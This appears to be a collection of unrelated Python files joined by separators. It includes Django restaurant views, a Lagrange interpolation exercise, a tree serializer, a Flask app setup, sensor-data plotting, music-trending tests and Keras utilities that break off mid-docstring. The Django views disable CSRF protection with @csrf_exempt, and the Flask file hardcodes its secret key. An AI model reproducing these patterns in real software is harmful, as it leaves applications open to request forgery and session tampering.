'Zeevruchten_gerechten': Zeevruchten_gerechten, 'Vegetarische_gerechten':Vegetarische_gerechten, 'Biryani_gerechten': Biryani_gerechten, 'Extra': Extra, 'Indiaas_brood':Indiaas_brood, 'Nagerechten':Nagerechten, 'Dranken':Dranken, 'cart_product_form':cart_product_form })
class NewReservation(CreateView):
template_name = "reservation.html"
form_class = ReservationForm
@csrf_exempt
def form_valid(self, form):
name = form.cleaned_data['first_name']
people = form.cleaned_data['people']
time = form.cleaned_data['time']
date = form.cleaned_data['date_reserved']
new = form.save(commit=False)
new.save()
# sends a flash message to the user
messages.success(
self.request,
"you have successfully booked a new" +
" table confirm your by paying for the table ")
# redirect the user back to his/her dashboard
user = self.request.user
return redirect("/thanks")
class Contact(CreateView):
template_name = "contact.html"
form_class = ContactForm
def form_valid(self, form):
new = form.save(commit=False)
new.save()
# send a flash message to the user
messages.success(
self.request,
"your message was sent successfully")
# redirect the user back to contact page
return redirect("/contact")
@csrf_exempt
def thankyou(request):
return render(request, 'payment_done.html')
@csrf_exempt
def thanks(request):
return render(request, 'thankyou.html')
@csrf_exempt
def sorry(request):
return render(request, 'sorry.html')
@csrf_exempt
def soon(request):
return render(request, 'soon.html')
def payment(request):
return render(request, "payment.html")
|
from sympy import *
from sympy import simplify
from scipy.interpolate import lagrange
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#2a
def lang(x_i,y_i):
x= symbols('x')
if len(x_i)==len(y_i):
yp=0
for i in range(len(x_i)):
p=1
for j in range(len(x_i)):
if j!=i:
p*=(x-x_i[j])/(x_i[i]-x_i[j])
yp+=y_i[i]*p
p_x=simplify(yp)
fx=lambdify(x,p_x,modules=['numpy'])
return fx
else:
return("len(x_i) should be equal to len(y_i)")
#2b
def in_lang(x_i,y_i):
return lang(y_i,x_i)
#2c
def inbuilt(x_i,y_i,x1):
poly = lagrange(x_i, y_i)
L=poly(x1)
return L
#Graph
def graph1(x_i,y_i,arr_x,arr_y_f,arr_y_in,pt_x,pt_y,xlab,ylab,titl):
plt.scatter(x_i,y_i,marker='*',c="red",label="Given discrete points")
plt.scatter(pt_x,pt_y,marker='o',c='black',label="Interpolated point")
plt.plot(arr_x,arr_y_in,c='blue',label="Scipy's Inbuilt function",linestyle="-.")
plt.plot(arr_x,arr_y_f,c="green",label="Interpolated langrange function")
plt.xlabel(xlab)
plt.ylabel(ylab)
plt.title(titl)
plt.grid(True)
plt.legend()
plt.show()
#3a
a=[0.00,0.2,0.4,0.6,0.8,1,1.2,1.4,1.6,1.8,2.0,2.2,2.4,2.6,2.8,3.0]
b=[1,0.99,0.96,0.91,0.85,0.76,0.67,0.57,0.46,0.34,0.22,0.11,0.00,-0.1,-0.18,-0.26]
g=lang(a,b)
k=in_lang(a,b)
arr_beta=np.linspace(0,3,1000)
arr_Jbeta_f=[]
arr_Jbeta_i=[]
for i in arr_beta:
arr_Jbeta_f.append(g(i))
arr_Jbeta_i.append(inbuilt(a,b,i))
arr_Jbeta=np.linspace(1,-0.26,1000)
arr_beta_f=[]
arr_beta_i=[]
for i in arr_Jbeta:
arr_beta_f.append(k(i))
arr_beta_i.append(inbuilt(b,a,i))
print("The value of bessel function for \u03B2 = 0.5 is ",g(2.3))
print("The value of \u03B2 for which the value of bessel function is 2.3 = ",k(0.5))
graph1(a,b,arr_beta,arr_Jbeta_f,arr_Jbeta_i,2.3,g(2.3),"\u03B2","J0_\u03B2","3a. (i) Bessel Function")
graph1(b,a,arr_Jbeta,arr_beta_f,arr_beta_i,0.5,k(0.5),"J0_\u03B2","\u03B2","3a. (ii) Inverse Bessel Function")
#3b
I=[2.81,3.24,3.80,4.30,4.37,5.29,6.03]
V=[0.5,1.2,2.1,2.9,3.6,4.5,5.7]
s=in_lang(I,V)
z=lang(I,V)
arr_I=np.linspace(2.81,6.03,1000)
arr_V_f=[]
arr_V_i=[]
for i in arr_I:
arr_V_f.append(z(i))
arr_V_i.append(inbuilt(I,V,i))
arr_V=np.linspace(0.5,5.7,1000)
arr_I_f=[]
arr_I_i=[]
for i in arr_V:
arr_I_f.append(s(i))
arr_I_i.append(inbuilt(V,I,i))
graph1(I,V,arr_I,arr_V_f,arr_V_i,3.79,z(3.79),"I","V","3b. (i) Photoelectric Effect")
graph1(V,I,arr_V,arr_I_f,arr_I_i,2.4,s(2.4),"V","I","3b. (ii) Inverse Photoelectric effect")
print("The value of I for V= 2.4 is ",s(2.4))
#Comparison
j=["3a (i)","3a (ii)","3b"]
d=[g(2.3),k(0.5),s(2.4)]
c=[inbuilt(a,b,2.3),inbuilt(b,a,0.5),inbuilt(V,I,2.4)]
error=np.array(d)-np.array(c)
print("# Comparison Table")
Data={"Ques":j,"Scipy":d,"My function":c,"Error":error}
print(pd.DataFrame(Data))
|
# -*- coding: utf-8 -*-
# @Author: 何睿
# @Create Date: 2019-02-08 16:23:16
# @Last Modified by: 何睿
# @Last Modified time: 2019-02-08 17:58:28
from collections import deque
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Codec:
def serialize(self, root):
"""
Encodes a tree to a single string.
:type root: TreeNode
:rtype: str
"""
# 我们使用二叉树的前序遍历来序列化二叉树
# 我们用空格来区分每个节点
# 我们用"None"来记录末尾的节点
if not root: return 'None '
self.res = ''
self.__serialize(root)
return self.res
def __serialize(self, root):
# 二叉树的前序遍历,递归实现
if not root:
self.res += "None "
return
self.res += str(root.val) + " "
self.__serialize(root.left)
self.__serialize(root.right)
return
def deserialize(self, data):
"""
Decodes your encoded data to tree.
:type data: str
:rtype: TreeNode
"""
# 反序列化,我们把输入的字符串用空格区分
# 注意要去掉最后一个空格
# 我们用队列来存储所有节点的值
_data = deque(data[:-1].split(' '))
return self.__deserialize(_data)
def __deserialize(self, data):
# 当没有节点时返回空
if not data: return None
# 每次从队首弹出元素
value = data.popleft()
if value == "None": return None
root = TreeNode(int(value))
# 序列化左子树
root.left = self.__deserialize(data)
# 序列化右子树
root.right = self.__deserialize(data)
return root |
from UE4Parse.BinaryReader import BinaryStream
from UE4Parse.Assets.Objects.FText import FText
class FNavAgentSelectorCustomization:
SupportedDesc: FText
def __init__(self, reader: BinaryStream):
self.SupportedDesc = FText(reader)
|
from helpers.mockdbhelper import MockDBHelper
from flask import Flask, redirect, request, url_for, render_template
from htmlmin.main import minify
from application.mod_authentication.models import UserMix
from config import MOCK_TEST, DEBUG, APP_NAME
from helpers.dbhelper import DB as DB_CON
from helpers.loginhelper import LoginHelper
application = Flask(__name__)
# application.config.from_object('config')
application.secret_key = "ahdgate26t237ahd82ejTqhd912y9uo1Yu3017jsyfuwye7rSFUGWUF45243"
if MOCK_TEST:
DB = MockDBHelper()
else:
DB = DB_CON
print("looks hmm")
@application.before_request
def _connect_db():
if not MOCK_TEST:
DB.connect()
@application.teardown_request
def _close_db():
if not MOCK_TEST and not DB.is_closed():
DB.close()
@application.after_request
def response_minify(response):
"""
minify html response to decrease site traffic
"""
if not DEBUG and response.content_type == u'text/html; charset=utf-8':
response.set_data(
minify(response.get_data(as_text=True))
)
return response
return response
@application.errorhandler(401)
def unauthorized_page(e):
print(str(e) + " : is here -->" + __file__)
# import pdb; pdb.set_trace()
# return redirect(url_for("mod_authentication.login"), 401)
return redirect(url_for('mod_authentication.login', next=request.url))
# return render_template('404.html'), 404
@application.errorhandler(403)
def unauthorized_page(e):
return render_template('403.html')
@application.context_processor
def custom_data_to_template():
data = {}
if LoginHelper.is_authenticated():
data.update({'is_authenticated': True})
else:
data.update({'is_authenticated': False})
data.update({'app_name': APP_NAME})
return data
|
#####
# @brief Visualize a given dDCA dataset
#
# Python script to generate a SVG graph of the data of a given dDCA
# dataset via matplotlib. It generates one figure with three subplots:
# 1.) use case-related data (air/soil temperature/humidity)
# 2.) self-diagnostic data (fault indicators) & fault label
# 3.) danger/ safe indicator and resulting fault context
# The input file (CSV) format expected is:
# SNID, UNIX_timestamp, SNTIME,
# Tair, Tsoil, Hair, Hsoil,
# Xnt, Xvs, Xbat, Xart, Xrst, Xic, Xadc, Xusart,
# fault_label
# antigen, danger indicator, safe indicator, fault context
# Thereby, the first line contains the header and can be ignored.
#
# The ddca dataset has to be given as parameter, for example:
# => $ python3 visualize_ddca_dataset.py results/base_-_indoor_-_stable-ddca.csv 1
# where the 2nd parameter defines the transparency of the SVG output
#
# @file visualize_ddca_dataset.py
# @author Dominik Widhalm
# @version 1.0.0
# @date 2021/12/01
#####
##### LIBRARIES ########################
# For date/time
from datetime import datetime
from datetime import timedelta
# To handle the command line parameter
import sys
# directory/file functionality
import os
# To get filename without path and extension
from pathlib import Path
# CSV functionality
import csv
# for plotting
import matplotlib.pyplot as plt
plt.rcParams.update({'font.size': 12})
from matplotlib import rc
rc('mathtext', default='regular')
from matplotlib.ticker import (AutoLocator, AutoMinorLocator, MultipleLocator)
import matplotlib.dates as md
##### GLOBAL VARIABLES #####
# Output directory
OUT_DIR = "plots/"
# Date/time format
fmt = '%Y-%m-%d %H:%M:%S'
xfmt = md.DateFormatter('%H:%M\n%m/%d')
##### METHODS ##########################
# See https://www.codegrepper.com/code-examples/python/python+datetime+round+to+nearest+hour
def hour_rounder(t):
# Rounds to nearest hour by adding a timedelta hour if minute >= 30
return (t.replace(second=0, microsecond=0, minute=0, hour=t.hour)
+timedelta(hours=t.minute//30))
##### VISUALIZATION ####################
### Check input file
# Parameter given
if (len(sys.argv) < 2):
print("ERROR: the script needs at least the input CSV file as parameter!")
exit(-1)
# Correct extension
if not (str(sys.argv[1]).endswith('.csv') or str(sys.argv[1]).endswith('.CSV')):
print("ERROR: CSV file expected as input!")
exit(-1)
# Use given file as input
CSV_INPUT = str(sys.argv[1])
# Check if output directory exists
if not os.path.exists(OUT_DIR):
try:
os.makedirs(OUT_DIR)
except Exception as e:
print("ERROR: Couldn't create directory for results ... aborting!")
print(e)
exit(-1)
# Base SVG filename on input filename
SVG_OUTPUT = OUT_DIR+Path(CSV_INPUT).stem + "-plot.svg"
# Use 2nd parameter for transparency
TRANSPARENT = None
if len(sys.argv) >= 3:
TRANSPARENT = int(sys.argv[2])
else:
TRANSPARENT = 0
### Get data from CSV file
csv_i = None
try:
# Open CSV input file
csv_f = open(CSV_INPUT, 'r')
# Get a CSV reader
csv_i = csv.reader(csv_f, delimiter=',')
except Exception as e:
print("Cannot open the CSV input file \"%s\" ... aborting!" % CSV_INPUT)
exit(-1)
### Prepare data arrays/lists/etc.
# general
snid = []
tstmp = []
time = []
sntime = []
# use case data
Tair = []
Tsoil = []
Hair = []
Hsoil = []
# fault indicator
Xnt = []
Xvs = []
Xbat = []
Xart = []
Xrst = []
Xic = []
Xadc = []
Xusart = []
# fault label
label = []
# DCA indicators
antigen = []
danger = []
safe = []
# Fault context
context = []
# Iterate over entries
line_count = 0
for row in csv_i:
# ignore first line
if line_count>0:
### META DATA ###
snid.append(str(row[0]))
tmp = int(row[1])
tstmp.append(tmp)
time.append(datetime.utcfromtimestamp(tmp))
sntime.append(int(row[2]))
### USE CASE DATA ###
Tair.append(round(float(row[3]),2))
Tsoil.append(round(float(row[4]),2))
Hair.append(round(float(row[5]),2))
Hsoil.append(round(float(row[6]),2))
### FAULT INDICATOR ###
Xnt.append(round(float(row[7]),2))
Xvs.append(round(float(row[8]),2))
Xbat.append(round(float(row[9]),2))
Xart.append(round(float(row[10]),2))
Xrst.append(round(float(row[11]),2))
Xic.append(round(float(row[12]),2))
Xadc.append(round(float(row[13]),2))
Xusart.append(round(float(row[14]),2))
### FAULT LABEL ###
label.append(int(row[15]))
### dDCA DATA ###
antigen.append(str(row[16]))
danger.append(round(float(row[17]),2))
safe.append(round(float(row[18]),2))
### FAULT CONTEXT ###
context.append(int(row[19]))
line_count = line_count + 1
### Plot the data via matplotlib
# get lowest (first) and highest (last) time
x_first = hour_rounder(time[0])
x_last = hour_rounder(time[-1])
# prepare figure
fig = plt.figure(figsize=(15,8), dpi=300, tight_layout=True)
ax1 = fig.add_subplot(311)
ax1b = ax1.twinx()
ax2 = fig.add_subplot(312)
ax3 = fig.add_subplot(313)
ax3b = ax3.twinx()
### use case data ###
# grid
ax1.grid(which='major', color='#CCCCCC', linestyle=':')
# x-axis
ax1.set_xlim(x_first,x_last)
ax1.xaxis.set_major_locator(AutoLocator())
ax1.xaxis.set_minor_locator(AutoMinorLocator(2))
ax1.set_xticklabels([])
ax1b.set_xlim(x_first,x_last)
ax1b.set_xticklabels([])
# y-axis
ax1.set_ylabel(r"temperature [$^{\circ}$C]")
ax1.set_ylim(0,50)
ax1.spines['top'].set_visible(False)
ax1.spines['right'].set_visible(False)
ax1.yaxis.set_major_locator(MultipleLocator(10))
ax1.yaxis.set_minor_locator(AutoMinorLocator(2))
ax1b.set_ylabel("relative humidity [%]")
ax1b.set_ylim(0,100)
ax1b.spines['top'].set_visible(False)
ax1b.spines['left'].set_visible(False)
ax1b.xaxis.set_ticks_position('bottom')
ax1b.spines['bottom'].set_position(('data',0))
ax1b.yaxis.set_ticks_position('right')
ax1b.yaxis.set_major_locator(MultipleLocator(20))
ax1b.yaxis.set_minor_locator(AutoMinorLocator(2))
# plot data
lns1 = ax1.plot(time, Tair, '-', label=r"$T_{air}$", color="darkgreen")
lns2 = ax1.plot(time, Tsoil, '-', label=r"$T_{soil}$", color="limegreen")
lns3 = ax1b.plot(time, Hair, '-', label=r"$H_{air}$", color="darkblue")
lns4 = ax1b.plot(time, Hsoil, '-', label=r"$H_{soil}$", color="dodgerblue")
lns = lns1+lns2+lns3+lns4
labs = [l.get_label() for l in lns]
ax1b.legend(lns, labs, ncol=4, loc='lower center', facecolor='white', framealpha=1)
### indicator plot ###
# grid
ax2.grid(which='major', color='#CCCCCC', linestyle=':')
# x-axis
ax2.set_xlim(x_first,x_last)
ax2.xaxis.set_major_locator(AutoLocator())
ax2.xaxis.set_minor_locator(AutoMinorLocator(2))
ax2.set_xticklabels([])
# y-axis
ax2.set_ylabel("fault indicators")
ax2.set_ylim(0,1.1)
ax2.yaxis.set_major_locator(MultipleLocator(0.2))
ax2.yaxis.set_minor_locator(AutoMinorLocator(2))
ax2.spines['top'].set_visible(False)
ax2.spines['right'].set_visible(False)
# plot data
ax2.plot(time, Xnt, '-', label=r"$\chi_{NT}$", color="midnightblue")
ax2.plot(time, Xvs, '-', label=r"$\chi_{VS}$", color="darkgreen")
ax2.plot(time, Xbat, '-', label=r"$\chi_{BAT}$", color="rosybrown")
ax2.plot(time, Xart, '-', label=r"$\chi_{ART}$", color="orangered")
ax2.plot(time, Xrst, '-', label=r"$\chi_{RST}$", color="fuchsia")
ax2.plot(time, Xic, '-', label=r"$\chi_{IC}$", color="lime")
ax2.plot(time, Xadc, '-', label=r"$\chi_{ADC}$", color="aqua")
ax2.plot(time, Xusart, '-', label=r"$\chi_{USART}$", color="gold")
ax2.legend(framealpha=1, ncol=8, loc='upper center')
### DCA plot ###
# grid
ax3.grid(which='major', color='#CCCCCC', linestyle=':')
# x-axis
ax3.set_xlim(x_first,x_last)
ax3.xaxis.set_major_locator(AutoLocator())
ax3.xaxis.set_minor_locator(AutoMinorLocator(2))
ax3.set_xticklabels([])
ax3b.set_xlim(x_first,x_last)
ax3b.xaxis.set_major_locator(AutoLocator())
ax3b.xaxis.set_minor_locator(AutoMinorLocator(2))
ax3b.set_xlabel('time [H:M]')
ax3b.xaxis.set_major_formatter(xfmt)
# y-axis
ax3.set_ylabel("danger/fault indicators")
ax3.set_ylim(0,1.1)
ax3.spines['top'].set_visible(False)
ax3.spines['right'].set_visible(False)
ax3.yaxis.set_major_locator(MultipleLocator(0.2))
ax3.yaxis.set_minor_locator(AutoMinorLocator(2))
ax3b.set_ylabel("fault context")
ax3b.set_ylim(0,1.1)
ax3b.spines['top'].set_visible(False)
ax3b.spines['left'].set_visible(False)
ax3b.xaxis.set_ticks_position('bottom')
ax3b.spines['bottom'].set_position(('data',0))
ax3b.yaxis.set_ticks_position('right')
ax3b.yaxis.set_major_locator(MultipleLocator(0.2))
ax3b.yaxis.set_minor_locator(AutoMinorLocator(2))
# plot data
lns1 = ax3.plot(time, danger, '-', label="danger", color="red")
lns2 = ax3.plot(time, safe, '-', label="safe", color="green")
lns3 = ax3b.plot(time, context, '-', label="fault context", linewidth=1, color="darkorchid")
lns4 = ax3b.plot(time, label, '-', label="fault label", linewidth=1, color="cornflowerblue")
lns = lns1+lns2+lns3+lns4
labs = [l.get_label() for l in lns]
ax3b.legend(lns, labs, loc='center right', facecolor='white', framealpha=1)
### Finish figure
if TRANSPARENT:
plt.savefig(SVG_OUTPUT, transparent=True)
else:
plt.savefig(SVG_OUTPUT, transparent=False)
plt.cla()
plt.clf()
plt.close()
|
from . import config_folder
|
import logging
from datetime import datetime, timedelta
from src.models import TrackTrendingScore, TrendingParam, AggregateIntervalPlay
from src.utils.db_session import get_db
from src.tasks.generate_trending import generate_trending
from src.trending_strategies.aSPET_trending_tracks_strategy import (
TrendingTracksStrategyaSPET,
)
from src.trending_strategies.ePWJD_trending_tracks_strategy import (
TrendingTracksStrategyePWJD,
)
from tests.utils import populate_mock_db
logger = logging.getLogger(__name__)
# Setup trending from simplified metadata
def setup_trending(db):
# Test data
# test tracks
# when creating tracks, track_id == index
test_entities = {
"users": [
*[
{
"user_id": i + 1,
"handle": str(i + 1),
"wallet": str(i + 1),
"profile_picture": "Qm0123456789abcdef0123456789abcdef0123456789ab",
"cover_photo": "Qm0123456789abcdef0123456789abcdef0123456789ab",
"bio": "filled in",
}
for i in range(20)
]
],
"tracks": [
{"track_id": 1, "owner_id": 1},
{
"track_id": 2,
"owner_id": 1,
"created_at": datetime.now() - timedelta(days=1),
},
{
"track_id": 3,
"owner_id": 2,
"created_at": datetime.now() - timedelta(weeks=2),
},
{
"track_id": 4,
"owner_id": 2,
"created_at": datetime.now() - timedelta(weeks=6),
},
{
"track_id": 5,
"owner_id": 2,
"created_at": datetime.now() - timedelta(weeks=60),
},
{"track_id": 6, "owner_id": 2},
{"track_id": 7, "owner_id": 3},
{"track_id": 8, "owner_id": 3, "is_delete": True},
{"track_id": 9, "owner_id": 3, "is_unlisted": True},
],
"follows": [
# at least 200 followers for user_0
*[{"follower_user_id": 3 + i, "followee_user_id": 1} for i in range(10)],
*[{"follower_user_id": 3 + i, "followee_user_id": 2} for i in range(15)],
*[
{"follower_user_id": 3 + i, "followee_user_id": 3} for i in range(2)
], # Less than 3 followers, so 0 trending score
],
"plays": [
*[{"item_id": 1, "owner_id": 1} for i in range(10)],
*[{"item_id": 2, "owner_id": 1} for i in range(12)],
*[{"item_id": 3, "owner_id": 2} for i in range(13)],
*[{"item_id": 4, "owner_id": 2} for i in range(14)],
*[{"item_id": 5, "owner_id": 2} for i in range(15)],
*[{"item_id": 6, "owner_id": 2} for i in range(16)],
*[{"item_id": 7, "owner_id": 3} for i in range(17)],
*[
{"item_id": 1, "created_at": datetime.now() - timedelta(weeks=3)}
for i in range(10)
],
*[
{"item_id": 1, "created_at": datetime.now() - timedelta(weeks=50)}
for i in range(10)
],
*[
{"item_id": 1, "created_at": datetime.now() - timedelta(weeks=80)}
for i in range(10)
],
*[
{"item_id": 2, "created_at": datetime.now() - timedelta(weeks=2)}
for i in range(10)
],
*[
{"item_id": 3, "created_at": datetime.now() - timedelta(weeks=2)}
for i in range(10)
],
*[
{"item_id": 4, "created_at": datetime.now() - timedelta(weeks=4)}
for i in range(10)
],
*[
{"item_id": 5, "created_at": datetime.now() - timedelta(weeks=5)}
for i in range(10)
],
*[
{"item_id": 6, "created_at": datetime.now() - timedelta(weeks=6)}
for i in range(10)
],
],
"reposts": [
*[{"repost_item_id": 1, "user_id": i + 1} for i in range(13)],
*[
{
"repost_item_id": 1,
"user_id": i + 1,
"created_at": datetime.now() - timedelta(weeks=2),
}
for i in range(20)
],
*[
{
"repost_item_id": 1,
"user_id": i + 1,
"created_at": datetime.now() - timedelta(weeks=30),
}
for i in range(30)
],
*[{"repost_item_id": 2, "user_id": i + 1} for i in range(24)],
*[{"repost_item_id": 3, "user_id": i + 1} for i in range(25)],
*[{"repost_item_id": 4, "user_id": i + 1} for i in range(26)],
*[{"repost_item_id": 5, "user_id": i + 1} for i in range(27)],
*[{"repost_item_id": 6, "user_id": i + 1} for i in range(28)],
*[{"repost_item_id": 7, "user_id": i + 1} for i in range(29)],
*[
{
"repost_item_id": 2,
"user_id": i + 1,
"created_at": datetime.now() - timedelta(weeks=2),
}
for i in range(23)
],
*[
{
"repost_item_id": 3,
"user_id": i + 1,
"created_at": datetime.now() - timedelta(weeks=2),
}
for i in range(23)
],
*[
{
"repost_item_id": 4,
"user_id": i + 1,
"created_at": datetime.now() - timedelta(weeks=4),
}
for i in range(23)
],
*[
{
"repost_item_id": 5,
"user_id": i + 1,
"created_at": datetime.now() - timedelta(weeks=5),
}
for i in range(23)
],
*[
{
"repost_item_id": 6,
"user_id": i + 1,
"created_at": datetime.now() - timedelta(weeks=6),
}
for i in range(23)
],
],
"saves": [
*[{"save_item_id": 1, "user_id": i + 1} for i in range(4)],
*[
{
"save_item_id": 1,
"user_id": i + 1,
"created_at": datetime.now() - timedelta(weeks=3),
}
for i in range(8)
],
*[
{
"save_item_id": 1,
"user_id": i + 1,
"created_at": datetime.now() - timedelta(weeks=50),
}
for i in range(16)
],
*[
{
"save_item_id": 1,
"user_id": i + 1,
"created_at": datetime.now() - timedelta(weeks=60),
}
for i in range(1)
],
*[{"save_item_id": 2, "user_id": i + 1} for i in range(44)],
*[{"save_item_id": 3, "user_id": i + 1} for i in range(44)],
*[{"save_item_id": 4, "user_id": i + 1} for i in range(44)],
*[{"save_item_id": 5, "user_id": i + 1} for i in range(44)],
*[{"save_item_id": 6, "user_id": i + 1} for i in range(44)],
*[{"save_item_id": 7, "user_id": i + 1} for i in range(44)],
*[
{
"save_item_id": 2,
"user_id": i + 1,
"created_at": datetime.now() - timedelta(weeks=2),
}
for i in range(44)
],
*[
{
"save_item_id": 3,
"user_id": i + 1,
"created_at": datetime.now() - timedelta(weeks=2),
}
for i in range(44)
],
*[
{
"save_item_id": 4,
"user_id": i + 1,
"created_at": datetime.now() - timedelta(weeks=4),
}
for i in range(44)
],
*[
{
"save_item_id": 5,
"user_id": i + 1,
"created_at": datetime.now() - timedelta(weeks=5),
}
for i in range(44)
],
*[
{
"save_item_id": 6,
"user_id": i + 1,
"created_at": datetime.now() - timedelta(weeks=6),
}
for i in range(44)
],
],
}
populate_mock_db(db, test_entities)
# Tests
def test_update_interval_plays(app):
"""Test that refreshing aggregate_interval_plays gives the correct values"""
with app.app_context():
db = get_db()
# setup
setup_trending(db)
with db.scoped_session() as session:
session.execute("REFRESH MATERIALIZED VIEW aggregate_interval_plays")
aggregate_interval_plays = session.query(AggregateIntervalPlay).all()
def get_track_plays(track_id):
for param in aggregate_interval_plays:
if param.track_id == track_id:
return param
return None
assert len(aggregate_interval_plays) == 7
track_plays = get_track_plays(1)
assert track_plays.week_listen_counts == 10
assert track_plays.month_listen_counts == 20
assert track_plays.year_listen_counts == 30
def test_update_trending_params(app):
"""Test that refreshing trending params gives the correct values"""
with app.app_context():
db = get_db()
# setup
setup_trending(db)
with db.scoped_session() as session:
session.execute("REFRESH MATERIALIZED VIEW aggregate_user")
session.execute("REFRESH MATERIALIZED VIEW aggregate_track")
session.execute("REFRESH MATERIALIZED VIEW aggregate_plays")
session.execute("REFRESH MATERIALIZED VIEW aggregate_interval_plays")
session.execute("REFRESH MATERIALIZED VIEW trending_params")
trending_params = session.query(TrendingParam).all()
# Test that trending_params are not generated for hidden/deleted tracks
# There should be 7 valid tracks with trending params
assert len(trending_params) == 7
def get_track_id(track_id):
for param in trending_params:
if param.track_id == track_id:
return param
return None
t1 = get_track_id(1)
assert t1.play_count == 40
assert t1.owner_follower_count == 10
assert t1.repost_count == 63
assert t1.repost_week_count == 13
assert t1.repost_month_count == 33
assert t1.repost_year_count == 63
assert t1.save_count == 29
assert t1.save_week_count == 4
assert t1.save_month_count == 12
assert t1.save_year_count == 28
# user 1 has 10 followers
# user 2 has 15 followers
# user 3 has 2 followers
# 3 saves from all 3 users
# 4 reposts from user 1
# 3 reposts from users 2, 3
# -> (3 * 10 + 3 * 15 + 3 * 2) + (4 * 10 + 3 * 15 + 3 * 2) = 172
assert float(t1.karma) == 172
def test_update_track_score_query(app):
"""Happy path test: test that we get all valid listens from prior year"""
with app.app_context():
db = get_db()
# setup
setup_trending(db)
prev_strategy = TrendingTracksStrategyePWJD()
udpated_strategy = TrendingTracksStrategyaSPET()
with db.scoped_session() as session:
session.execute("REFRESH MATERIALIZED VIEW aggregate_user")
session.execute("REFRESH MATERIALIZED VIEW aggregate_track")
session.execute("REFRESH MATERIALIZED VIEW aggregate_plays")
session.execute("REFRESH MATERIALIZED VIEW aggregate_interval_plays")
session.execute("REFRESH MATERIALIZED VIEW trending_params")
udpated_strategy.update_track_score_query(session)
scores = session.query(TrackTrendingScore).all()
# Test that scores are not generated for hidden/deleted tracks
# There should be 7 valid tracks * 3 valid time ranges (week/month/year)
assert len(scores) == 21
def get_time_sorted(time_range):
return sorted(
[score for score in scores if score.time_range == time_range],
key=lambda k: (k.score, k.track_id),
reverse=True,
)
week_scores = get_time_sorted("week")
month_scores = get_time_sorted("month")
year_scores = get_time_sorted("year")
assert len(week_scores) == 7
assert len(month_scores) == 7
assert len(year_scores) == 7
# Check that the type and version fields are correct
for score in scores:
assert score.type == udpated_strategy.trending_type.name
assert score.version == udpated_strategy.version.name
# Check that the type and version fields are correct
for score in scores:
assert score.type == udpated_strategy.trending_type.name
assert score.version == udpated_strategy.version.name
def get_old_trending(time_range):
genre = None
old_trending_params = generate_trending(
session, time_range, genre, 10, 0, prev_strategy
)
track_scores = [
prev_strategy.get_track_score(time_range, track)
for track in old_trending_params["listen_counts"]
]
# Re apply the limit just in case we did decide to include more tracks in the scoring than the limit
sorted_track_scores = sorted(
track_scores, key=lambda k: (k["score"], k["track_id"]), reverse=True
)
return sorted_track_scores
previous_week_trending = get_old_trending("week")
for idx, updated_score in enumerate(week_scores):
assert previous_week_trending[idx]["track_id"] == updated_score.track_id
assert round(previous_week_trending[idx]["score"], 2) == round(
updated_score.score, 2
)
previous_month_trending = get_old_trending("month")
for idx, updated_score in enumerate(month_scores):
assert previous_month_trending[idx]["track_id"] == updated_score.track_id
assert round(previous_month_trending[idx]["score"], 2) == round(
updated_score.score, 2
)
previous_year_trending = get_old_trending("year")
for idx, updated_score in enumerate(year_scores):
assert previous_year_trending[idx]["track_id"] == updated_score.track_id
assert round(previous_year_trending[idx]["score"], 2) == round(
updated_score.score, 2
)
|
class VulnerabilityNotTrigger(Exception):
pass
class ExecutionError(Exception):
pass
class AbnormalGDBBehavior(Exception):
pass
class InvalidCPU(Exception):
pass |
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import keras
from keras.layers import LSTM, Bidirectional, GRU
from dlpy.utils import DLPyError
''' Keras-specific utilities '''
def remove_layer_wrapper(layer):
'''
Determines underlying layer type for wrapped layers
Parameters
----------
layer : Layer object
Current layer object
Returns
-------
string
class name of wrapped layer
list of layer objects
unwrapped layer object(s)
'''
class_name = layer.__class__.__name__.lower()
# check for layer wrappers
sublayers = []
if class_name == 'timedistributed':
layer_info = layer.get_config()['layer']
layer_info['config']['name'] = layer.name
class_name = layer_info['class_name'].lower()
if class_name == 'dense':
sublayers.append(keras.layers.Dense(**layer_info['config']))
else:
raise DLPyError(class_name + ' is an unsupported time distributed '
'layer type - model conversion failed')
elif class_name == 'bidirectional':
layer_info = layer.get_config()['layer']
class_name = layer_info['class_name'].lower()
# forward direction
layer_info['config']['name'] = layer.forward_layer.name
layer_info['config']['go_backwards'] = False
if class_name == 'lstm':
sublayers.append(keras.layers.LSTM(**layer_info['config']))
elif class_name == 'gru':
sublayers.append(keras.layers.GRU(**layer_info['config']))
elif class_name == 'simplernn':
sublayers.append(keras.layers.SimpleRNN(**layer_info['config']))
elif class_name == 'cudnnlstm':
sublayers.append(keras.layers.CuDNNLSTM(**layer_info['config']))
elif class_name == 'cudnngru':
sublayers.append(keras.layers.CuDNNGRU(**layer_info['config']))
else:
raise DLPyError(class_name + ' is an unsupported time distributed '
'layer type - model conversion failed')
# backward direction
layer_info['config']['name'] = layer.backward_layer.name
layer_info['config']['go_backwards'] = True
if class_name == 'lstm':
sublayers.append(keras.layers.LSTM(**layer_info['config']))
elif class_name == 'gru':
sublayers.append(keras.layers.GRU(**layer_info['config']))
elif class_name == 'simplernn':
sublayers.append(keras.layers.SimpleRNN(**layer_info['config']))
elif class_name == 'cudnnlstm':
sublayers.append(keras.layers.CuDNNLSTM(**layer_info['config']))
elif class_name == 'cudnngru':
sublayers.append(keras.layers.CuDNNGRU(**layer_info['config']))
else:
raise DLPyError(class_name + ' is an unsupported time distributed '
'layer type - model conversion failed')
else:
sublayers.append(layer)
# Must return sublayers in reverse order if CUDNN is used.
# This aligns the Viya layer mapping with the CUDNN layer
# mapping.
if layer.__class__.__name__.lower() == 'bidirectional':
sublayer_info = layer.get_config()['layer']
if sublayer_info['class_name'].lower() in ['cudnnlstm','cudnngru']:
sublayers.reverse()
#sublayers = [sublayers[1], sublayers[0]]
return class_name, sublayers
def create_cpu_compatible_layer(layer, model_type='CNN'):
'''
Creates a new layer object using parameters from the
provided layer
Parameters
----------
layer : Layer object
Current layer object
model_type : string, optional
Current model type (one of 'CNN' or 'RNN')
